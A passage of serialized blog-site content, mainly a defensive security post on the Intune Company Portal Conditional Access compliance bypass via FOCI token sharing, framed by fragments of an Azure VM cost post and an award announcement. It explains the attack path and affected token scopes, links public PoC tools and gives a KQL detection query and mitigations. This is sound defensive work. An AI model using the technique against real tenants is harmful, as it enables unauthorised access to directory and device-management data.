necessary.",[12,6879,6880,6882],{},[251,6881,6831],{}," Schedule the VM to shut down during non-business hours. Just remember to account for update management to avoid security risks. Azure Automation Accounts can automate VM start and stop schedules.",[12,6884,6885,6888,6890],{},[251,6886,6887],{},"Example: 24/7 Usage",[531,6889],{},"\nSome systems, such as domain controllers, must be available around the clock to respond to users, clients, and servers.",[12,6892,6893,6895,6896,6901],{},[251,6894,6831],{}," For such cases, ",[2672,6897,6900],{"href":6898,"rel":6899},"https://azure.microsoft.com/en-us/pricing/reserved-vm-instances/?msockid=11c5d32a1e116e2101f6c6241ff16ff8",[2676],"Azure Reserved Instances"," are ideal. Organizations commit to a fixed amount of compute resources for 1–3 years at a discounted rate. 
Billing can be monthly or upfront, and Reserved Instances can often be applied to other VMs of the same SKU when available.",[12,6903,6904,6907,6909],{},[251,6905,6906],{},"Example: Upcoming Modernization",[531,6908],{},"\nSometimes, VMs are still needed while a transition to cloud-native services like Azure Functions or Kubernetes is being planned. If the migration is expected within three months, Reserved Instances might not be worthwhile.",[12,6911,6912,5449,6914,6919,6920,6925],{},[251,6913,6831],{},[2672,6915,6918],{"href":6916,"rel":6917},"https://learn.microsoft.com/en-us/azure/cost-management-billing/savings-plan/savings-plan-compute-overview",[2676],"Azure Savings Plan"," offers flexibility. Similar to Reserved Instances, it spans 1–3 years but covers a broader range of ",[2672,6921,6924],{"href":6922,"rel":6923},"https://azure.microsoft.com/en-us/pricing/offers/savings-plan-compute/#Select-services",[2676],"Azure services",". Companies commit to spending a set amount per hour, receiving discounted rates on eligible services up to that limit. Costs exceeding the commitment are billed at standard rates.",[186,6927,6929],{"id":6928},"licenses","Licenses",[12,6931,47],{},[12,6933,6934],{},"Operating system licenses are often overlooked in cost optimization. By default, Azure provides a rental license for the OS when creating a VM. 
However, many organizations already own licenses.",[12,6936,6937,6940,6942,6943,6948],{},[251,6938,6939],{},"Solution: Azure Hybrid Benefit",[531,6941],{},"\nWith ",[2672,6944,6947],{"href":6945,"rel":6946},"https://azure.microsoft.com/en-us/pricing/hybrid-benefit/?msockid=11c5d32a1e116e2101f6c6241ff16ff8#features",[2676],"Azure Hybrid Benefit",", existing licenses, such as Windows Server, can be applied to Azure VMs.",[12,6950,6951],{},[2642,6952],{"alt":6953,"src":6954},"Azure Hybrid Benefit Windows Server","https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure_hybrid_benefit_ms_picture_windows_server.png",[12,6956,6957],{},"This option isn’t limited to Windows but also applies to other licensed systems like Red Hat, SUSE Enterprise, and Microsoft SQL Server.",[12,6959,6960],{},"Using existing licenses in Azure has specific requirements. Once met, simply enable the Hybrid Benefit in the VM settings to unlock savings. A quick comparison of VMs with and without Hybrid Benefit highlights the cost advantage.",[12,6962,6963],{},[2642,6964],{"alt":6947,"src":6965},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/azure-hybrid-benefit.png",[12,6967,6968],{},"It’s worth exploring whether your existing licenses qualify for Azure Hybrid Benefit.",[41,6970,4287],{"id":4286},[12,6972,6973],{},"Careful resource allocation, targeted runtime optimization, and leveraging existing licenses are key steps to reducing costs. It’s also worthwhile to evaluate alternatives to VMs and consider cloud-native services. 
Tools like the Azure Pricing Calculator, Azure Automation, and options such as Azure Hybrid Benefit help maintain clarity and identify savings opportunities.",[12,6975,6976],{},"For long-term success in the cloud, continuously assess and optimize your infrastructure while balancing cost and value.",{"title":65,"searchDepth":111,"depth":111,"links":6978},[6979,6980,6981,6986],{"id":6724,"depth":111,"text":6725},{"id":6756,"depth":111,"text":6757},{"id":6800,"depth":111,"text":6801,"children":6982},[6983,6984,6985],{"id":6809,"depth":329,"text":6810},{"id":6863,"depth":329,"text":6864},{"id":6928,"depth":329,"text":6929},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":6988,"titleClass":2173,"date":6989,"categories":6990,"blogtitlepic":6991,"socialimg":6992,"customExcerpt":6993,"keywords":6994,"hreflang":6995,"scripts":7000},"Optimize Azure VM Costs: Top Tips and Strategies","2024-11-11",[4232],"head-vm-cost-optimization","/blog/heads/head-vm-cost-optimization.jpg","Virtual Machines (VMs) in Azure can be more expensive than expected, especially without proper optimization. This article shows you how to cut costs by selecting the right VM SKU, optimizing runtimes, and leveraging existing licenses effectively. 
With the right strategies, you can make your cloud expenses more efficient in the long run.","Azure VM costs, cloud cost optimization, virtual machines, Azure SKU, Azure Hybrid Benefit, cloud-native services, cost optimization Azure, VM runtime optimization, Azure Reserved Instances, Azure Automation",[6996,6998],{"lang":2260,"href":6997},"/blog/azure/2024/11/vm-cost-optimization-on-azure",{"lang":2263,"href":6999},"/blog/azure/2024/11/vm-cost-optimization-on-azure-es",{"slick":2181,"form":2181},"/posts/2024-11-11-vm-cost-optimization-on-azure",{"title":6710,"description":6718},"posts/2024-11-11-vm-cost-optimization-on-azure",[7005,6211,7006],"Azure Automation","Azure Cost Optimization","UEpPO9pXeVSWtkmZmp-ibyRnZqgC7Yy2MTR852-3IMw",{"id":7009,"title":7010,"author":7011,"body":7012,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7630,"moment":7632,"navigation":2181,"path":7656,"seo":7657,"stem":7658,"tags":7659,"webcast":2168,"__hash__":7663},"content_en/posts/2025-01-14-compliant-device-bypass.md","Compliant Device Bypass - All you need to know!",[2494,2373,2530],{"type":9,"value":7013,"toc":7613},[7014,7018,7020,7070,7074,7076,7088,7095,7106,7112,7115,7119,7121,7125,7127,7130,7132,7192,7195,7198,7202,7204,7208,7210,7225,7232,7235,7238,7240,7243,7246,7249,7257,7268,7271,7273,7276,7280,7282,7285,7290,7294,7296,7299,7302,7305,7449,7453,7455,7458,7497,7501,7503,7510,7513,7516,7530,7533,7536,7589,7597,7599,7601,7604,7607,7610],[41,7015,7017],{"id":7016},"what-happened-so-far","What happened so far?",[12,7019,31],{},[1254,7021,7022,7043,7058,7067],{},[1257,7023,7024,7025,7030,7031,7036,7037,7042],{},"In December 2024 ",[2672,7026,7029],{"href":7027,"rel":7028},"https://x.com/TEMP43487580",[2676],"Yuya Chudo"," gave his talk 
“",[2672,7032,7035],{"href":7033,"rel":7034},"https://www.blackhat.com/eu-24/briefings/schedule/#unveiling-the-power-of-intune-leveraging-intune-for-breaking-into-your-cloud-and-on-premise-42176",[2676],"Unveiling the Power of Intune: Leveraging Intune for Breaking Into Your Cloud and On-Premise","” at the Black Hat Europe conference. In this session he showed how to abuse a hardcoded rarely known exclusion in Conditional Access (CA) for device compliance in combination with the undocumented “",[2672,7038,7041],{"href":7039,"rel":7040},"https://github.com/secureworks/family-of-client-ids-research",[2676],"FOCI-Feature","” in Entra ID. In the talk he also presented the response from Microsoft MSRC (VULN-123240) that this behavior is by design and required for successful Intune Enrollment of new devices.",[1257,7044,7045,7046,7051,7052,7057],{},"Some days after the conference Sunny Chau published the proof-of-concept tool ",[2672,7047,7050],{"href":7048,"rel":7049},"https://github.com/JumpsecLabs/TokenSmith",[2676],"TokenSmith"," including a ",[2672,7053,7056],{"href":7054,"rel":7055},"https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/",[2676],"companion blog posts"," - what made the technique available for a broader audience.",[1257,7059,7060,7061,7066],{},"In addition, a ",[2672,7062,7065],{"href":7063,"rel":7064},"https://github.com/zh54321/PoCEntraDeviceComplianceBypass/blob/main/poc_entra_compliance_bypass.ps1",[2676],"PoC written in PowerShell"," has been published.",[1257,7068,7069],{},"Since the end of December, we at glueckkanja AG have been investigating how to prevent and detect this technique. 
In this blog post we would like to share some of our insights regarding the attack and discuss mitigation and detection options.",[41,7071,7073],{"id":7072},"tldr","TL;DR",[12,7075,31],{},[12,7077,7078,7079,7084,7085],{},"There are some resources with a built-in exclusion to specific Grant Controls/Conditions in Conditional Access to solve certain problems. One of them is the exclusion of the Company Portal App for Device Compliance to solve the chicken-egg-problem to get devices enrolled in Intune before they are considered compliant. This behavior is ",[2672,7080,7083],{"href":7081,"rel":7082},"https://learn.microsoft.com/en-us/entra/identity/conditional-access/policy-alt-all-users-compliant-hybrid-or-mfa#:~:text=You%20can%20enroll,Company%20Portal%20application",[2676],"documented here",".\n",[251,7086,7087],{},"This means you can get access and refresh token for this app from an unmanaged device even if a CA policy is enforcing Device Compliance for “All resources”.",[12,7089,7090,7094],{},[2642,7091],{"alt":7092,"src":7093},"image.png","https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-02.png","{: .post__screenshot}",[12,7096,7097,7098,7102,7103],{},"Microsoft has implemented a feature called Family of Client IDs (FOCI) which allows a group of Microsoft OAuth client applications to obtain access tokens as any other client in the family using their refresh token. A behavior otherwise not allowed in the OAuth2 standard. Read the ",[2672,7099,7101],{"href":7039,"rel":7100},[2676],"original work of Secureworks"," for more details.\n",[251,7104,7105],{},"Since the Company Portal App is a “family member” the requested Refresh Tokens for it can be used to get tokens for other apps in the family.",[12,7107,7108,7109],{},"The FOCI feature is limited and the consent between the client id and the resource must be explicitly configured and granted. 
In the case of the Company Portal App this consent has been granted, among others, for access to Microsoft Graph using a restricted scope and to the Azure AD Graph API with the permission of the current user.\n",[251,7110,7111],{},"This means a Company Portal refresh token can be used to obtain e.g. Azure AD Graph API access tokens with the scope user_impersonation, allowing us to do a lot of things with eg. AADInternals or ROADrecon",[12,7113,7114],{},"To execute the attack, the attacker requires either valid credentials of the victim as well as the ability to perform MFA if this is required by Conditional Access or a valid refresh token.",[41,7116,7118],{"id":7117},"what-risk-and-blast-radius-exists","What risk and blast radius exists?",[12,7120,31],{},[186,7122,7124],{"id":7123},"which-of-the-possible-resources-scopes-are-affected-from-the-compliance-exclusion","Which of the possible resources (scopes) are affected from the compliance exclusion?",[12,7126,47],{},[12,7128,7129],{},"The Attacker has the option to request tokens for another FOCI application as already described before. However, Microsoft has implemented a bypass for the device compliance requirements only for accessing tokens to certain resource applications various API permission scope. 
In particular, the following delegated API permissions are sensitive and of interest to attackers:",[2127,7131,6585],{},[417,7133,7134,7147],{},[422,7135,7136],{},[426,7137,7138,7141,7144],{},[430,7139,7140],{},"Resource Application",[430,7142,7143],{},"Application Id",[430,7145,7146],{},"Delegated Permission Scope",[438,7148,7149,7160,7171,7182],{},[426,7150,7151,7154,7157],{},[443,7152,7153],{},"AADGraph",[443,7155,7156],{},"00000002-0000-0000-c000-000000000000",[443,7158,7159],{},"user_impersonation",[426,7161,7162,7165,7168],{},[443,7163,7164],{},"Microsoft Graph API",[443,7166,7167],{},"00000003-0000-0000-c000-000000000000",[443,7169,7170],{},"“email\", \"openid\", \"profile\",\"Device.Read.All\", \"DeviceManagementConfiguration.Read.All\", \"DeviceManagementConfiguration.ReadWrite.All\", \"ServicePrincipalEndpoint.Read.All\", \"User.Read”",[426,7172,7173,7176,7179],{},[443,7174,7175],{},"Device Registration Service",[443,7177,7178],{},"01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9",[443,7180,7181],{},"adrs_access",[426,7183,7184,7187,7190],{},[443,7185,7186],{},"Windows Azure Service Management API",[443,7188,7189],{},"797f4846-ba00-4fd7-ba43-dac1f8f63013",[443,7191,7159],{},[12,7193,7194],{},"Since the granted permissions are not for the application itself, the impact depends on the privileges of the caller (user account) and which delegated permission scopes are authorized to execute API calls on the scope.",[12,7196,7197],{},"Let us have a closer look at the criticality of the shown delegated permission scope and potential authorization to call sensitive APIs?",[41,7199,7201],{"id":7200},"which-privileges-and-delegated-scope-are-critical","Which privileges and delegated scope are critical?",[12,7203,31],{},[186,7205,7207],{"id":7206},"azure-ad-graph-api","Azure AD Graph API",[12,7209,47],{},[12,7211,7212,7213,7218,7219,7224],{},"The legacy programmatic interface offers many APIs to manage directory settings and objects in Entra ID (Azure AD). 
This includes Conditional Access policies, directory roles, CRUD on groups and devices and operations on the signed-in user, such as change password. A full list of all supported operations can be found in the ",[2672,7214,7217],{"href":7215,"rel":7216},"https://learn.microsoft.com/en-us/previous-versions/azure/ad/graph/api/api-catalog",[2676],"Azure AD Graph API reference",". This API will be fully retired on June 30, 2025 (based on ",[2672,7220,7223],{"href":7221,"rel":7222},"https://learn.microsoft.com/en-us/graph/migrate-azure-ad-graph-overview",[2676],"Microsoft latest announcements",").",[12,7226,7227,7228,7231],{},"The assigned delegated scope “user_impersonation” allows the application (in this case, Company Portal) to act on behalf of the user. So, every permission that the signed-in user has to an Entra object, scope or directory-level can be used as authorization in the API calls. The user might be the owner of an Entra ID object (application, group, or other objects), or they might be assigned permissions through Entra ID role assignments. ",[251,7229,7230],{},"In the case of active high privileged role assignments, this would allow the attacker to modify objects or compromise the tenant",". At least, even without any privileges, default user permissions can be used for extensive reconnaissance and enumeration of directory objects in the tenant.",[12,7233,7234],{},"Therefore, the scenarios and impact to abuse the Azure AD Graph API depends on the active or permanent assigned privileges of the affected user. APIs to access Microsoft 365 services (e.g., for exfiltration of OneDrive) are not included in Azure AD Graph.",[186,7236,7164],{"id":7237},"microsoft-graph-api",[12,7239,47],{},[12,7241,7242],{},"In comparison to Azure AD Graph, the delegated scope to Microsoft Graph API is restricted to a certain scope. 
Alongside OpenID scopes (openid, email, profile) and basic read operations on behalf of the user (ServicePrincipalEndpoint.Read.All, User.Read).",[12,7244,7245],{},"List and read of all device objects can be achieved by calling “device” endpoint in Microsoft Graph with default permissions by using “Device.Read.All\". This could help attackers to gain insights of device objects.",[12,7247,7248],{},"In case of a compromised user with assignment to “Intune Administrator” or any delegation in Microsoft Intune RBAC, the following granted delegated API permission should be considered problematic:",[1254,7250,7251,7254],{},[1257,7252,7253],{},"”DeviceManagementConfiguration.Read.All”",[1257,7255,7256],{},"“DeviceManagementConfiguration.ReadWrite.All”",[12,7258,7259],{},[251,7260,7261,7262,7267],{},"Those delegated permissions allow CRUD operations, for example on Device Compliance and Configuration Policies but also deployment of ",[2672,7263,7266],{"href":7264,"rel":7265},"https://learn.microsoft.com/en-us/graph/api/intune-shared-devicemanagementscript-create?view=graph-rest-beta",[2676],"Management Scripts"," for further malicious activity on target devices.",[186,7269,7175],{"id":7270},"device-registration-service",[12,7272,47],{},[12,7274,7275],{},"With this permission the attacker is able to join or register a device to Entra ID. In turn this would allow them to even enroll the device in Intune and depending on the Intune configuration get a valid and compliant to device to access even more protected services.",[186,7277,7279],{"id":7278},"other-foci-applications","Other FOCI applications",[12,7281,47],{},[12,7283,7284],{},"Requesting access to other privileged interfaces, for example Azure Resource Manager API is in scope of FOCI and interests of the attacker well. 
However, this resource is still protected and not bypassed to the Conditional access grant control “compliant device”.",[12,7286,7287],{},[2642,7288],{"alt":7092,"src":7289},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/company-portal-ca-bypass-03.png",[41,7291,7293],{"id":7292},"can-we-detect-this-attack-technique","Can we detect this attack technique?",[12,7295,31],{},[12,7297,7298],{},"As described above, the greatest risk comes from access to MS Graph and Azure AD Graph.",[12,7300,7301],{},"Since the application ID of the Microsoft Intune Company Portal App is always used in this case, the main task for creating a detection is to exclude legitimate use by e.g. device registrations, which according to our observation consists of which resources are accessed first in a session → in case of an attack usually MS Graph or Azure AD Graph.",[12,7303,7304],{},"Here is a working detection that we tested in several environments different sizes:",[52,7306,7307,7308,3935,7310,3940,7312,7314,7317,540,7319,7321,540,7325,3935,7327,7329,7330,540,7333,7335,540,7338,3935,7340,7342,7343,7345,540,7348,3935,7350,7352,7353,1402,7356,805,7359,7362,7363,3935,7365,7367,7368,7370,540,7373,3935,7375,1402,7378,7380,7381,7383,7384,7386,7387,540,7389,7383,7391,7394,7395,7398,7399,7401,7402,7367,7405,7407,540,7410,3935,7412,7414,7415,3935,7417,7419,7420,540,7422,7424,540,7426,3935,7428,7329,7430,540,7432,7434,540,7437,3935,7439,7352,7441,1402,7443,805,7445,7362,7447],{"style":3931},"\nAADSignInEventsBeta ",[531,7309],{},[102,7311,3939],{"style":3938},[102,7313,3944],{"style":3943},[102,7315,7316],{"style":3947},"7d",[102,7318,1288],{"style":3943},[531,7320],{},[102,7322,7324],{"style":7323},"color: #75715E;","// Access to Microsoft Intune Company Portal",[531,7326],{},[102,7328,3939],{"style":3938}," ApplicationId == ",[102,7331,7332],{"style":3958},"@\"9ba1a5c7-f17a-4de9-a1f1-6178c8d51223\"",[531,7334],{},[102,7336,7337],{"style":7323},"// From non joined/registered 
device",[531,7339],{},[102,7341,3939],{"style":3938}," isempty(AadDeviceId) ",[531,7344],{},[102,7346,7347],{"style":7323},"// Used to access resource Microsoft Graph or Windows Azure Active Directory",[531,7349],{},[102,7351,3939],{"style":3938}," ResourceId ",[102,7354,7355],{"style":3938},"in",[102,7357,7358],{"style":3958},"\"00000002-0000-0000-c000-000000000000\"",[102,7360,7361],{"style":3958},"\"00000003-0000-0000-c000-000000000000\"",") ",[531,7364],{},[102,7366,4089],{"style":3938}," SessionId ",[531,7369],{},[102,7371,7372],{"style":7323},"// Find the initial logon event based on the session Id",[531,7374],{},[102,7376,7377],{"style":3938},"join kind=inner",[531,7379],{},"\n    AADSignInEventsBeta ",[531,7382],{},"\n    | ",[102,7385,3939],{"style":3938}," ErrorCode == ",[102,7388,808],{"style":3947},[531,7390],{},[102,7392,7393],{"style":3938},"summarize arg_min(","Timestamp, *",[102,7396,7397],{"style":3938},") by"," SessionId)",[531,7400],{},"\n    ",[102,7403,7404],{"style":3938},"on",[531,7406],{},[102,7408,7409],{"style":7323},"// Ignore trusted and managed devices",[531,7411],{},[102,7413,3939],{"style":3938}," isempty(DeviceTrustType) ",[531,7416],{},[102,7418,3939],{"style":3938}," IsManaged != ",[102,7421,839],{"style":3947},[531,7423],{},[102,7425,7324],{"style":7323},[531,7427],{},[102,7429,3939],{"style":3938},[102,7431,7332],{"style":3958},[531,7433],{},[102,7435,7436],{"style":7323},"// when the first requested resource is Microsoft Graph or Windows Azure Active Directory",[531,7438],{},[102,7440,3939],{"style":3938},[102,7442,7355],{"style":3938},[102,7444,7358],{"style":3958},[102,7446,7361],{"style":3958},[531,7448],{},[41,7450,7452],{"id":7451},"how-should-we-respond-when-we-detect-suspicious-activities","How should we respond when we detect suspicious activities?",[12,7454,31],{},[12,7456,7457],{},"Initialize your incident response process using a defined playbook which 
contains:",[1254,7459,7460,7480,7488,7491,7494],{},[1257,7461,7462,7463],{},"Hunting for suspicious or anomalous activity by the compromised user\n",[1254,7464,7465,7471,7474,7477],{},[1257,7466,7467,7468],{},"Summary of non-interactive sign-in to Resource Applications including IP addresses and UserAgents based on ",[63,7469,7470],{},"sessionId",[1257,7472,7473],{},"Check if Microsoft Entra Audit Logs shown critical operations by the user or IP addresses (e.g., added credentials to owned app registrations)",[1257,7475,7476],{},"Identify if the user has registered devices in the affected session",[1257,7478,7479],{},"Check Intune audit logs for operations by application “Company Portal” and the affected user",[1257,7481,7482,7483],{},"Hunting for related alerts by the impacted entities\n",[1254,7484,7485],{},[1257,7486,7487],{},"Lookup for entities in the AlertEvidence table to identify other alerts based on SessionId, IP Addresses and User",[1257,7489,7490],{},"Identify criticality of the user (by privileges) in Exposure Management",[1257,7492,7493],{},"Review of hunting results and verify if the action was legitimate as part of a device enrollment.",[1257,7495,7496],{},"Identity the initial access vector and reset the users’ credentials and when needed devices.",[41,7498,7500],{"id":7499},"can-we-mitigate-the-attack","Can we mitigate the attack?",[12,7502,31],{},[12,7504,7505,7506,7509],{},"Since the configured exclusion is required for Intune enrollment, ",[251,7507,7508],{},"there is no mitigation that would not break other parts of Microsoft 365",". Access to the Azure AD Graph resource cannot be scoped or blocked directly. Any Conditional Access policy using “Block” as grant control will prevent access but might have other implications.",[12,7511,7512],{},"But for mitigation it is crucial to understand that this Conditional Access bypass is not a complete attack. 
It is a technique which as a step allows a range of attacks.",[12,7514,7515],{},"An attack path could be",[3259,7517,7518,7521,7524,7527],{},[1257,7519,7520],{},"Account Compromise via Phishing and AiTM",[1257,7522,7523],{},"Conditional Access Bypass",[1257,7525,7526],{},"Reconnaissance using e.g. ROADrecon, GraphRunner or AADInternals",[1257,7528,7529],{},"Lateral Movement, Privilege Escalation or Persistence through a newly registered device enrolled in Intune",[12,7531,7532],{},"Since we are not able to mitigate the Conditional Access bypass without breaking Intune enrollment, it is more than reasonable to implement mitigations at the other steps off the attack path and also implement reasonable detections.",[12,7534,7535],{},"To reduce the probability and impact we suggest increasing the strengths of other controls and implement the following soon:",[1254,7537,7538,7544,7550,7556,7562,7577,7583],{},[1257,7539,7540,7543],{},[251,7541,7542],{},"Enforce MFA for “All Users” and “All Cloud Apps” through Conditional Access."," If you only enforce Device Compliance Single Factor Authentication is enough with this technique.",[1257,7545,7546,7549],{},[251,7547,7548],{},"Do not use Device Compliance or MFA in your rulesets, always enforce both!"," Using OR would never restrict all access to compliant device, because an access token with MFA in scope would be sufficient to access the tenant.",[1257,7551,7552,7555],{},[251,7553,7554],{},"Restrict Security Information Registration to Compliant Devices, Phishing Resistant Authentication or TAP."," In our tests we did not manage to bypass Device Compliance for the Security Info Registration.",[1257,7557,7558,7561],{},[251,7559,7560],{},"Require Phishing Resistant Authentication or TAP for Join or Register Devices"," Without it will be possible to register a device with e.g. 
AADInternals and this technique.",[1257,7563,7564,7567,7568],{},[251,7565,7566],{},"Require MFA and “Sign-in frequency every time” for Microsoft Intune Enrollment"," This limits the timespan an attacker could use fresh credentials to enroll a new device to Intune.\n",[2110,7569,7570],{},[12,7571,7572,7573,7576],{},"🚧\n",[251,7574,7575],{},"Caution: Sign-in frequency every time = Every five minutes","\nMicrosoft factors for five minutes of clock skew when “every time” is selected in a conditional access policy, so that users do not get prompted more often than once every five minutes.",[1257,7578,7579,7582],{},[251,7580,7581],{},"Block personally owned devices in the Intune Enrollment restrictions."," Without these restrictions, an attacker could enroll a new device and gain additional foothold.",[1257,7584,7585,7588],{},[251,7586,7587],{},"Set device compliance to fail when no compliance policy is assigned to a device in Intune."," By default each device is considered compliant, even if no policy is actually applied. Change this and make a device compliance policy a requirement.",[12,7590,7591,7592,1013],{},"In the long run, we would like to encourage you to invest in rollout password-less, phishing-resistant authentication like Windows Hello for Business and Passkeys (incl. Platform Credentials by using macOS Platform SSO). This will allow you to subsequently enforce phishing resistant authentication and block AiTM attacks. Instead of password allow the usage of Temporary Access Pass (TAP) for limited time and scenarios, e.g. onboarding new devices or employees. To support the usage of TAPs for various use cases we have built ",[2672,7593,7596],{"href":7594,"rel":7595},"https://myworkid.cloud/",[2676],"MyWorkID",[41,7598,4287],{"id":4286},[12,7600,31],{},[12,7602,7603],{},"Conditional Access as the Zero Trust engine for Entra ID is, in itself, already complicated. 
Added built-in exclusions in the backend of Entra by Microsoft make it even harder for many to understand the impact of policies and protections. Still the idea of Zero Trust and defense in depth holds up.",[12,7605,7606],{},"The device compliance policy prevents most AiTM attacks and multi-factor authentication makes it harder for any attacker to abuse leaked or otherwise compromised credentials.",[12,7608,7609],{},"All these security measures must be used together and not one instead of the other. This ensures a secure environment, even if one of the defenses is tampered with or overcome.",[12,7611,7612],{},"We strongly recommend deploying the provided detection in Microsoft Defender XDR to ensure detection of potential abuse. Make sure your SOC is prepared to investigate those incidents and provide them with the necessary playbooks.",{"title":65,"searchDepth":111,"depth":111,"links":7614},[7615,7616,7617,7620,7626,7627,7628,7629],{"id":7016,"depth":111,"text":7017},{"id":7072,"depth":111,"text":7073},{"id":7117,"depth":111,"text":7118,"children":7618},[7619],{"id":7123,"depth":329,"text":7124},{"id":7200,"depth":111,"text":7201,"children":7621},[7622,7623,7624,7625],{"id":7206,"depth":329,"text":7207},{"id":7237,"depth":329,"text":7164},{"id":7270,"depth":329,"text":7175},{"id":7278,"depth":329,"text":7279},{"id":7292,"depth":111,"text":7293},{"id":7451,"depth":111,"text":7452},{"id":7499,"depth":111,"text":7500},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":7631,"titleClass":2173,"date":7632,"categories":7633,"blogtitlepic":7634,"socialimg":7635,"customExcerpt":7636,"keywords":7637,"contactInContent":7638,"scripts":7655},"Compliant Device Bypass in Microsoft Intune – Detection, Response & Mitigation","2025-01-14",[2176],"header-company-portal-ca-bypass","/blog/heads/header-company-portal-ca-bypass.png","In this blog post, glueckkanja's MVP Fabian Bader, Chris Brumm and Thomas Naunheim gather details about the Compliant Device Bypass in Microsoft 
Intune Company Portal. After additional research, they have found an approach to detect and respond to the potential threat. You'll also find guidance on Conditional Access to reduce the attack surface and details on the blast radius.","Compliant Device Bypass, Microsoft Intune, Conditional Access, Entra ID, Intune Company Portal, device compliance, CA exclusion, TokenSmith PoC, cloud security, PowerShell PoC, Fabian Bader, Christopher Brumm, Thomas Naunheim, security threat, Black Hat Europe, Intune Enrollment, MSRC response, attack detection, threat mitigation, cloud compliance, FOCI feature",{"quote":2168,"infos":7639},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7640,"level":41,"textStyling":2204,"flush":2205,"person":7641,"form":7645},"Would you like to learn more about the Compliant Device Bypass and how to detect and mitigate it effectively? Our experts are ready to walk you through our findings and support you with proven strategies for enhanced security. 
We look forward to connecting with you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":7642},[7643,7644],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":7646,"method":2169,"action":2216,"fields":7647},{"skin":2215},[7648,7649,7650,7651,7652,7653,7654],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6359},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"slick":2181,"form":2181},"/posts/2025-01-14-compliant-device-bypass",{"title":7010,"description":65},"posts/2025-01-14-compliant-device-bypass",[2176,7660,7661,7662],"Entra","Conditional Access","ITDR","h8bIBLTx3L5xSgsiz2-6RK4zsL8vGPfSXh44Gwz7uiw",{"id":7665,"title":7666,"author":7667,"body":7668,"cta":2166,"description":7734,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7735,"moment":7737,"navigation":2181,"path":7772,"seo":7773,"stem":7774,"tags":7775,"webcast":2168,"__hash__":7776},"content_en/posts/2025-03-04-mssp-2025.md","'23, '24, '25 – the triple is complete!",[2461],{"type":9,"value":7669,"toc":7729},[7670,7676,7680,7682,7689,7691,7695,7697,7700,7703,7714,7717,7721,7723,7726],[12,7671,7672,7675],{},[251,7673,7674],{},"After 2023 and 2024, our success story continues: glueckkanja is once again among the frontrunners of the Microsoft Security Excellence Awards in 2025."," As a leading Managed Security Service Provider (MSSP), we are once again among the top partners recognized by Microsoft for outstanding achievements in cybersecurity. 
Three consecutive years in this league – that speaks for itself.",[41,7677,7679],{"id":7678},"one-of-the-most-coveted-awards-in-the-industry","One of the most coveted awards in the industry",[12,7681,31],{},[12,7683,7684,7685,7688],{},"The Microsoft Security Excellence Awards are among the most prestigious awards in the IT security industry. Each year, Microsoft honors partners who set new standards in defending against cyber threats. In 2025, glueckkanja is once again among the ",[251,7686,7687],{},"top contenders in the \"Security MSSP of the Year\" category"," – an award given exclusively to the best Managed Security Service Providers.",[5082,7690],{":quotes":5082,":no-fullscreen":3821},[41,7692,7694],{"id":7693},"awarded-three-years-in-a-row-and-this-is-just-the-beginning","Awarded three years in a row – and this is just the beginning",[12,7696,31],{},[12,7698,7699],{},"Our repeated recognition as a leading MSSP is the result of our consistent focus on innovative security solutions and excellent service. glueckkanja combines cutting-edge Microsoft security technologies with deep expertise and a clear goal: to optimally secure companies in an increasingly threatening cyber world. And the direct customer feedback speaks for itself:",[12,7701,7702],{},"Our CSOC Customer Poll shows the outstanding quality of our services:",[1254,7704,7705,7708,7711],{},[1257,7706,7707],{},"87% rate our technical expertise at the highest level",[1257,7709,7710],{},"94% praise our 24/7 coverage",[1257,7712,7713],{},"100% are satisfied with the overall experience",[12,7715,7716],{},"A big thank you to Microsoft and MISA for their trust, valuable partnership, and continuous support. This community of leading security experts is more than a network – it is an ecosystem that sets standards together. A special thanks also to all MISA partners: Your innovations and commitment drive us all forward. 
Together, we make the digital world safer.",[41,7718,7720],{"id":7719},"_23-24-25-we-set-the-standard-in-microsoft-security","'23, '24, '25 – We set the standard in Microsoft Security",[12,7722,31],{},[12,7724,7725],{},"Awarded three years in a row – this is more than a success, it is a clear sign of excellence. glueckkanja remains at the forefront of the Microsoft security landscape and will continue to set standards with innovative solutions and outstanding service quality.",[12,7727,7728],{},"We look forward to further collaboration with Microsoft, our customers, and partners – and to the next chapter in our success story.",{"title":65,"searchDepth":111,"depth":111,"links":7730},[7731,7732,7733],{"id":7678,"depth":111,"text":7679},{"id":7693,"depth":111,"text":7694},{"id":7719,"depth":111,"text":7720},"After 2023 and 2024, our success story continues: glueckkanja is once again among the frontrunners of the Microsoft Security Excellence Awards in 2025. As a leading Managed Security Service Provider (MSSP), we are once again among the top partners recognized by Microsoft for outstanding achievements in cybersecurity. Three consecutive years in this league – that speaks for itself.",{"lang":2171,"seoTitle":7736,"titleClass":2173,"date":7737,"categories":7738,"blogtitlepic":7739,"socialimg":7740,"customExcerpt":7741,"keywords":7742,"hreflang":7743,"quotes":7748,"contactInContent":7754},"Microsoft Security Excellence Awards: glueckkanja once again finalist as Security MSSP of the Year 2025","2025-03-04",[2962],"head-mssp-finalist-2025","/socialimg/og-img-mssp-2025.png","glueckkanja is once again a finalist at the Security MSSP of the Year Awards, placing us among the world's leading Managed Microsoft Security Providers to be celebrated in April at the RSA Conference in San Francisco. 
